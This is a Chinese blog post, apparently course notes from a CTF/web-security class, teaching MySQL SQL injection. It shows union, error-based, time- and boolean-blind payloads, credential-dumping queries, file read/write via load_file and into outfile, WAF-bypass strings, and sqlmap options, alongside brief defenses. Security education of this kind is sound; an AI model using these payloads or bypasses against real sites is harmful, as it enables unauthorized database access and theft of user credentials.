<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">
  <meta name="google-site-verification" content="xnevF7kqEaJI7y45BmO0xpIUVUa0xusjcJ0MIFbvX2I">
  <meta name="msvalidate.01" content="0E006AA8DCC38A710D0287C1DD04DDCA">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="https://fonts.loli.net/css2?family=Lato:ital,wght@0,300;0,400;0,700;1,300;1,400;1,700&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/7.0.0/css/all.min.css" integrity="sha256-VHqXKFhhMxcpubYf9xiWdCiojEbY9NexQ4jh8AxbvcM=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancyapps-ui/6.0.17/fancybox/fancybox.css" integrity="sha256-yE0aDX61mjiw8FoDuGetFttFoGJMeWsU/iYEFOfpMhA=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"tianlipa.github.io","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.24.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":16,"offset":12},"hljswrap":true,"codeblock":{"theme":{"light":"default","dark":"stackoverflow-dark"},"prism":{"light":"prism","dark":"prism-dark"},"copy_button":{"enable":true,"style":null},"fold":{"enable":false,"height":500},"language":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":true,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeIn","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js" defer></script>

    <meta name="description" content="第一章 MySQL语法 union查询需要前后语句查询字段数量相同 order by字段名&#x2F;数字 MySQL系统库 information_schema库：信息数据库，保存关于MySQL服务器维护的所有其他水库的信息  SCHEMATA表：提供当前MySQL实例中所有数据库信息 TABLES表：提供关于数据中表的信息，table_name COLOMNS表：提供表的列信息，column_name">
<meta property="og:type" content="article">
<meta property="og:title" content="2-SQL注入">
<meta property="og:url" content="https://tianlipa.github.io/2025/08/msb-02-sql-injection/index.html">
<meta property="og:site_name" content="tianlipa">
<meta property="og:description" content="第一章 MySQL语法 union查询需要前后语句查询字段数量相同 order by字段名&#x2F;数字 MySQL系统库 information_schema库：信息数据库，保存关于MySQL服务器维护的所有其他水库的信息  SCHEMATA表：提供当前MySQL实例中所有数据库信息 TABLES表：提供关于数据中表的信息，table_name COLOMNS表：提供表的列信息，column_name">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://tianlipa.github.io/img/msb/17372058872557.png">
<meta property="og:image" content="https://tianlipa.github.io/img/msb/17374514447604.png">
<meta property="article:published_time" content="2025-08-13T05:34:26.000Z">
<meta property="article:modified_time" content="2025-08-13T06:11:48.801Z">
<meta property="article:author" content="tianlipa">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="web">
<meta property="article:tag" content="马士兵">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://tianlipa.github.io/img/msb/17372058872557.png">


<link rel="canonical" href="https://tianlipa.github.io/2025/08/msb-02-sql-injection/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://tianlipa.github.io/2025/08/msb-02-sql-injection/","path":"2025/08/msb-02-sql-injection/","title":"2-SQL注入"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>2-SQL注入 | tianlipa</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/fancyapps-ui/6.0.17/fancybox/fancybox.umd.js" integrity="sha256-32A/chfN6JgQkwK/QFZY8siVcOZj3LUt1vSKIcDvshM=" crossorigin="anonymous" defer></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/lozad.js/1.16.0/lozad.min.js" integrity="sha256-mOFREFhqmHeQbXpK2lp4nA3qooVgACfh88fpJftLBbc=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>

  



  <script src="/js/third-party/fancybox.js" defer></script>



  




  

  <script class="next-config" data-name="enableMath" type="application/json">false</script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.16.9/katex.min.css" integrity="sha256-UF1fgpAiu3tPJN/uCqEUHNe7pnr+QR0SQDNfgglgtcM=" crossorigin="anonymous">



  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">tianlipa</p>
      <i class="logo-line"></i>
    </a>
      <div id="randomParagraph" class="site-subtitle" itemprop="description"></div>
      <script src="/js/subtitle.js"></script>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-收藏"><a href="/collection/" rel="section"><i class="fa fa-heart fa-fw"></i>收藏</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-overview-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">tianlipa</p>
  <div class="site-description" itemprop="description">本站所有内容<br>都是我家猫写的<br>如有任何疑问<br>喵喵喵喵喵喵喵</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">112</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">18</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/tianlipa" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;tianlipa" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i></a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:tianlipa@qq.com" title="E-Mail → mailto:tianlipa@qq.com" rel="noopener me" target="_blank"><i class="fa fa-envelope fa-fw"></i></a>
      </span>
      <span class="links-of-author-item">
        <a href="https://steamcommunity.com/id/tianlipa" title="Steam → https:&#x2F;&#x2F;steamcommunity.com&#x2F;id&#x2F;tianlipa" rel="noopener me" target="_blank"><i class="fab fa-steam fa-fw"></i></a>
      </span>
      <span class="links-of-author-item">
        <a href="https://www.zhihu.com/people/tianlipa" title="Zhihu → https:&#x2F;&#x2F;www.zhihu.com&#x2F;people&#x2F;tianlipa" rel="noopener me" target="_blank"><i class="fab fa-zhihu fa-fw"></i></a>
      </span>
  </div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://tianlipa.github.io/2025/08/msb-02-sql-injection/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="tianlipa">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="tianlipa">
      <meta itemprop="description" content="本站所有内容<br>都是我家猫写的<br>如有任何疑问<br>喵喵喵喵喵喵喵">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="2-SQL注入 | tianlipa">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          2-SQL注入
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>
      

      <time title="创建时间：2025-08-13 13:34:26 / 修改时间：14:11:48" itemprop="dateCreated datePublished" datetime="2025-08-13T13:34:26+08:00">2025-08-13</time>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h2 id="第一章">第一章</h2>
<h3 id="MySQL语法">MySQL语法</h3>
<p>union查询需要前后语句查询字段数量相同</p>
<p>order by字段名/数字</p>
<h3 id="MySQL系统库">MySQL系统库</h3>
<p>information_schema库：信息数据库，保存关于MySQL服务器维护的所有其他水库的信息</p>
<ul>
<li>SCHEMATA表：提供当前MySQL实例中所有数据库信息</li>
<li>TABLES表：提供关于数据中表的信息，table_name</li>
<li>COLOMNS表：提供表的列信息，column_name</li>
</ul>
<p>performance_schema库：数据库服务器性能参数</p>
<p>mysql库：核心数据库，存储数据库的用户（账户）信息</p>
<p>sys库：系统数据库，结合了information_schema和performance_schema库的内容</p>
<span id="more"></span>
<h2 id="第二章-MySQL手工注入">第二章 MySQL手工注入</h2>
<ol>
<li>检查输入过滤，判断有无注入点(and 1=1)</li>
<li>猜解列名数量：order by</li>
<li>通过报错方式判断回显点：union</li>
<li>信息收集：<br>
version()数据库版本，database()数据库名称<br>
高版本：5.0+，系统库：information_schema, performance_schema, …<br>
低版本：5.0以下，没有系统库</li>
<li>使用对应SQL进行注入<br>
information_schema.tables查找表名<br>
查询所有数据库名：<br>
<code>union select 1,group_concat(schema_name),3 from information_schema.schemata</code><br>
查询security库下所有表名：<br>
<code>union select 1,table_name,3 from informaion_schema.tables where table_schema = ‘security’</code><br>
‘security’可替换为database()<br>
<code>group_concat(table_name)</code>数据合并分组<br>
查询表中字段：<br>
<code>union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘users’</code><br>
字符可以转换成十六进制<br>
找到字段名后：<br>
<code>select username,password from users</code><br>
<code>select group_concat(username,0x3a,password) from users</code></li>
</ol>
<h3 id="高权限注入">高权限注入</h3>
<p>多个网站共享MySQL服务器时，可以从高权限数据库注入到低权限数据库。</p>
<p>user()查看用户</p>
<p>mysql库中存在4个控制权限的表，user(最高权限), db(对数据库的权限), tables_priv(对表名的操作权限), columns_priv(对字段的操作权限)。</p>
<blockquote>
<p>mysql权限表的验证过程为：<br>
先从user表中的Host,User,Password这3个字段中判断连接的ip、用户名、密码是否存在，存在则通过验证。</p>
</blockquote>
<blockquote>
<p>通过身份认证后，进行权限分配，按照user，db，tables_priv，columns_priv的顺序进行验证。即先检查全局权限表user，如果user中对应的权限为Y，则此用户对所有数据库的权限都为Y，将不再检查db, tables_priv,columns_priv；如果为N，则到db表中检查此用户对应的具体数据库，并得到db中为Y的权限；如果db中为N，则检查tables_priv中此数据库对应的具体表，取得表中的权限Y，以此类推。</p>
</blockquote>
<blockquote>
<p>MySQL 权限级别分为：<br>
全局性的管理权限： 作用于整个MySQL实例级别<br>
数据库级别的权限： 作用于某个指定的数据库上或者所有的数据库上<br>
数据库对象级别的权限：作用于指定的数据库对象上（表、视图等）或者所有的数据库对象上</p>
</blockquote>
<blockquote>
<p>权限存储在mysql库的user, db, tables_priv, columns_priv, and procs_priv这几个系统表中，待MySQL实例启动后就加载到内存中</p>
</blockquote>
<p><img data-src="/img/msb/17372058872557.png" alt="" loading="lazy"></p>
<h3 id="文件读写">文件读写</h3>
<p>前提条件：高权限</p>
<p>高版本MySQL添加了一个新的特性secure_file.priv, 限制了MySQL导出文件的权限。</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line"># Linux</span><br><span class="line">cat /etc/my.cnf</span><br><span class="line">    [mysqld]</span><br><span class="line">    secure_file.priv=</span><br><span class="line"></span><br><span class="line"># Windows</span><br><span class="line">my.ini</span><br><span class="line">    [mysqld]</span><br><span class="line">    secure_file.priv=</span><br></pre></td></tr></table></figure>
<p>空：没有限制，NULL：不能进行读写，=d:/xxx/xxx：只能读写该目录下文件。</p>
<p><code>show global variables like ‘%secure%’</code>查看MySQL全局变量的配置。</p>
<p>读文件函数<code>load_file()</code>，参数可以说单引号字符串，0x，char转换的字符，注意斜杠是/。<br>
可以在union中作为一个字段使用，查看config.php, apache配置等。<br>
可以使用相对路径。</p>
<p>Windows常见路径：<br>
phpstudy:   phpstudy/www, phpstudy/PHPTutorial/www<br>
Xampp:  xampp/htdocs<br>
Wamp:   wamp/www<br>
Appser: appser/www</p>
<p>Linux常见路径：<br>
/var/mysql/data<br>
/var/www/html</p>
<p>获取路径常见方式：报错显示，遗留文件，漏洞报错，平台配置文件等。</p>
<p>写入文件：函数<code>Into Outfile</code>（能写入多行，按格式输出），<code>into Dumpfile</code>（只能写入一行，没有输出格式）。<br>
outfile不能接0x或char，只能是单引号路径。</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">union select 1,’abc’,3 into outfile ‘d:/1.txt —-+’</span><br></pre></td></tr></table></figure>
<h3 id="基础防御">基础防御</h3>
<h4 id="魔术引号">魔术引号</h4>
<p>php.ini中magic_quotes_gpc = On/Off<br>
(GET/POST/Cookie)</p>
<h3 id="内置函数">内置函数</h3>
<p>is_int()<br>
addslashes()<br>
mysql_real_escape_string()<br>
mysql_escape_string()</p>
<h3 id="自定义关键字过滤">自定义关键字过滤</h3>
<p>str_replace()</p>
<h3 id="其他">其他</h3>
<p>其他安全防护软件如WAF等</p>
<h2 id="第三章-数据类型与提交方式">第三章 数据类型与提交方式</h2>
<p>类型转换：’1abc’和1</p>
<h3 id="模糊查询">模糊查询</h3>
<p><code>select * from users where username like ‘%D%’</code></p>
<h3 id="数据提交方式">数据提交方式</h3>
<h4 id="GET">GET</h4>
<p>url中传输数据，可利用联合注入方式直接注入。<br>
一般用于数据不敏感时，安全性不高，长度有限制，速度很快</p>
<h4 id="POST">POST</h4>
<p>直接传递给服务器。<br>
一般用于表单的提交，如登录框。安全性高，长度不限，速度不快。</p>
<h4 id="Cookie">Cookie</h4>
<p><code>$c = $_COOKIE[‘s’];</code><br>
可以绕过一些常规防御手段</p>
<h4 id="Request">Request</h4>
<p>可获取GET/POST参数。<br>
<code>$uname = $_REQUEST[‘uname’];</code></p>
<p>类似的超全局变量还有_SERVER。</p>
<h2 id="第四章-查询方式和报错注入">第四章 查询方式和报错注入</h2>
<h3 id="查询方式">查询方式</h3>
<h4 id="select查询数据">select查询数据</h4>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">select * from where id=$id</span><br></pre></td></tr></table></figure>
<h4 id="delete删除数据">delete删除数据</h4>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">delete from user where id=$id</span><br></pre></td></tr></table></figure>
<h4 id="insert插入数据">insert插入数据</h4>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">insert into user (id,name,pass) values(1,’lihua’,’1234’)</span><br></pre></td></tr></table></figure>
<h4 id="update更新数据">update更新数据</h4>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">update user set pwd=‘123’ where id=1</span><br></pre></td></tr></table></figure>
<h3 id="报错盲注">报错盲注</h3>
<h4 id="基于报错的SQL盲注-报错回显（强制性报错）">基于报错的SQL盲注 - 报错回显（强制性报错）</h4>
<p>updatexml(): 从目标XML中更改包含所查询值的字符串<br>
updatexml(XML_document, XPath_string, new_value);</p>
<p>extractvalue(): 从目标XML中返回包含所查询值的字符串<br>
extractvalue(XML_document, Xpath_string);</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">abc’ union select 1,extractvalue(1, concat(0x7e, (select version()), 0x7e))#</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">abc&#x27; union select 1,extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database()limit 0,1),0x7e))#</span><br></pre></td></tr></table></figure>
<p>注：limit 0,1: 从0开始取1个</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">abc&#x27; union select 1,updatexml(1,concat(0x7e,(select version()),0x7e),123)#</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">abc&#x27; or updatexml(1,concat(0x7e,(select version()),0x7e),123)#</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">abc&#x27; or updatexml(1,concat(0x7e,(select version()),0x7e),123) or’</span><br></pre></td></tr></table></figure>
<h3 id="延时盲注">延时盲注</h3>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">select if(database()=‘test’,123,456);</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">id=1 and sleep(if(length(database()=8),5,0));</span><br></pre></td></tr></table></figure>
<p>sleep():    休眠<br>
if():   分支结构<br>
mid(a,b,c): 从b开始，截取a字符串的c位<br>
substr(a,b,c):  从b开始，截取a字符串的c个字符<br>
left(a,b):  从左侧截取a的前b位<br>
length():   长度<br>
ord=ascii ascii(x)=100: 判断x的ascii值是否为100</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">sleep(if(mid(database(),1,1)=116,5,0);</span><br></pre></td></tr></table></figure>
<h3 id="布尔盲注">布尔盲注</h3>
<p>仅返回True或False时据此得到数据库中的信息。</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">1’ and ascii(mid(database(),1,1))&gt;115</span><br></pre></td></tr></table></figure>
<h3 id="加解密注入">加解密注入</h3>
<p>根据传输方式进行对应的加解密。</p>
<h3 id="无列名注入">无列名注入</h3>
<p>已知数据库，但不知道列名(information_schema被禁用)时，可以进行无列名注入。</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">select `3` from (select 1,2,3 union select * from users)a;</span><br><span class="line"></span><br><span class="line"># 正常情况下反引号会被过滤</span><br><span class="line">select b from (select 1,2 as b,3 union select * from users)a; # 查询第二列</span><br><span class="line"></span><br><span class="line">select concat(`2`,0x2d,`3`) from (select 1,2,3 union select * from users)a limit 1,3    #同时查询多个列</span><br></pre></td></tr></table></figure>
<h3 id="堆叠注入">堆叠注入</h3>
<p>利用注入点执行下一条SQL语句，与union联合注入的区别在于可以用于执行任意语句。</p>
<h2 id="WAF绕过">WAF绕过</h2>
<p>WAF拦截原理：从规则库中匹配敏感字符进行拦截。<br>
例：网站安全狗，宝塔，阿里云云盾</p>
<h3 id="更改数据提交方式">更改数据提交方式</h3>
<p>没啥用</p>
<h3 id="数据本身">数据本身</h3>
<p>更换大小写（没啥用）<br>
内联注释：data/**/base()<br>
双写绕过：ununionion<br>
<code>/*!union select * from users*/</code>感叹号后面的内容会执行</p>
<p>同义词替换：<br>
and &amp;&amp;<br>
or  ||<br>
= &lt;、&gt;<br>
空格  %09, %0a, %0b, %0c, %0d, %20, %a0, (), /**/<br>
注：%0a是换行，也可以指代空格</p>
<p>换行(\N)绕过</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">union #/*%0a select/*!1,2,3*/ —-+</span><br><span class="line">union/*//—-/*/ /*!—-+/*%0aselect/*11,database(),3*/ —+</span><br></pre></td></tr></table></figure>
<p>HTTP参污染：如果WAF没有对多参数进行多次过滤，则只会识别其中一个</p>
<p><img data-src="/img/msb/17374514447604.png" alt="" loading="lazy"></p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">?id=1&amp;id=-1%20union%20select%201,2,3%23*/</span><br></pre></td></tr></table></figure>
<h2 id="sqlmap">sqlmap</h2>
<ul>
<li>基于布尔类型的盲注</li>
<li>基于时间的盲注</li>
<li>基于报错注入</li>
<li>联合查询注入</li>
<li>堆查询注入</li>
<li>带外注入</li>
</ul>
<h3 id="GET型注入">GET型注入</h3>
<p>-u  GET提交方式，跟注入的url网址</p>
<p>—-dbs   获取所有数据库<br>
—-tables    获取所有数据表<br>
—-columns   获取所有字段<br>
—-dump  打印数据</p>
<p>-D  查询某个库<br>
-T  查询某个表<br>
-C  查询某个字段</p>
<p>—-level 高时测试范围更大<br>
—-risk</p>
<h3 id="POST型注入">POST型注入</h3>
<p>-r  加载文件<br>
-p  指定参数<br>
—-current-db    当前数据库<br>
—-forms 自动检测表单</p>
<h3 id="UA注入和Refer注入">UA注入和Refer注入</h3>
<p>注意，存在POST请求时才会出现referer。</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/CTF/" rel="tag"># CTF</a>
              <a href="/tags/web/" rel="tag"># web</a>
              <a href="/tags/%E9%A9%AC%E5%A3%AB%E5%85%B5/" rel="tag"># 马士兵</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2025/08/msb-01-data-collecting/" rel="prev" title="1-信息收集">
                  <i class="fa fa-angle-left"></i> 1-信息收集
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2025/08/msb-03-xss/" rel="next" title="3-XSS渗透与防御">
                  3-XSS渗透与防御 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">tianlipa</span>
  </div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>

</body>
</html>
